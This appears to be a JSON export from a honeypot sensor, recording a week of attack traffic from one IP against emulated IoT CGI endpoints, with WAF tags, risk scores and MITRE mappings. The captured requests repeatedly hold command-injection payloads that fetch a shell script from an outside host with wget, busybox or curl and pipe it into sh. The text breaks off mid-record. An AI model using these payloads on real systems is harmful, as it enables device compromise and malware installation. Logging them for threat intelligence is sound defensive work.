{"ip":"45.153.34.252","exported_at":"2026-07-14T07:04:28+00:00","period_days":7,"metrics":{"events7d":181,"distinct_ports":1,"distinct_classifications":6,"max_severity":10,"last_sensor_id":"paris-1","max_waf_score":72,"max_risk_score":82,"attack_stage":"exploit_attempt","attack_chain_stage":"exploitation","threat_family":["path_traversal","config_leak_scan"],"recommended_action":"investigate","confidence":1,"risk_breakdown":{"waf":100,"classification":74,"behavior":0,"geo":0,"protocol":43,"novelty":30},"mitre_tactics":["TA0001","TA0002"],"mitre_technique":"T1083","top_mitre_technique":"T1059","top_mitre_count":110,"executive_one_liner_fr":"Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP","campaign_hint_fr":null,"confidence_breakdown":{"waf":100,"classification":74,"behavior":0,"geo":0,"protocol":43,"novelty":30,"risk_score":64},"persona_hostname":"mail.sensor-1.internal","correlation_flags":[],"correlation_flags_labels_fr":[],"confidence_pct":100,"confidence_hint_fr":null,"sensor_role_label_fr":"Renseignement menaces","tags_summary_labels_fr":["Http Sensitive","Upstream","Waf Score"],"tags_summary":["INT-http_sensitive","INT-upstream","INT-waf-score"],"attack_vector":"config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026","protocol_details":{"http_method":"GET","http_path":"\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026","request_line":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026","port":8081,"service":"http","service_label_fr":"HTTP"},"protocol_summary_fr":"GET \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026 \u00b7 HTTP:8081","evidence_snippet":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb","target_port_label":"8081 \u00b7 HTTP","emulator_service":"http","confidence_reason":"Confiance 100 % \u2014 9 tag(s) WAF","classification_reason":"Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%","classification_reason_label_fr":"Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%","confidence_factors_fr":"Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF","payload_preview":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb"},"events":[{"id":11809712,"ip":"45.153.34.252","ts":"2026-07-14 02:30:00.000000","proto":"tcp","src_port":55120,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":60,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022099cdff692d53e863101007eec84a42f224aacbc\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 308, \u0022payload_entropy\u0022: 5.19407812495101, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 17, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002257d3e152325878e5e1059b9f3d5c5671526af71e\u0022, \u0022event_fingerprint\u0022: \u0022becf8f8d5e72f307b25a09d3a92570d34aebd172\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a54c28e76b3b5cc42ac12b2dc1912495\u0022, \u0022path_pattern_hash\u0022: \u0022d878a82020fc023d6ee51e23ab301813\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HT\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002270221a14dfe7ca42d5308d88b39ea6fd2a9799ff\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":308},{"id":11809710,"ip":"45.153.34.252","ts":"2026-07-14 02:29:59.000000","proto":"tcp","src_port":55102,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/export-cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022300ab642a93228222cdb109780fc2f3ed2c05989\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 319, \u0022payload_entropy\u0022: 5.207143355589302, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022bf38ea8cef8d51c26c553a16765c473947b2c4c8\u0022, \u0022event_fingerprint\u0022: \u0022edc3a60ccb30b2ba366249df638a417264f1480f\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c64b66a58f24dc21ec3485eda519f3cf\u0022, \u0022path_pattern_hash\u0022: \u0022319aefac71fa65635eb60e229c574b1d\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\n\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\\r\\nConnection: close\\r\\n\\r\\nsetCookie=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxsc;busybox wget http:\/\/91.92.40.118\/wget.s\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/export-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 170\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/export-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, 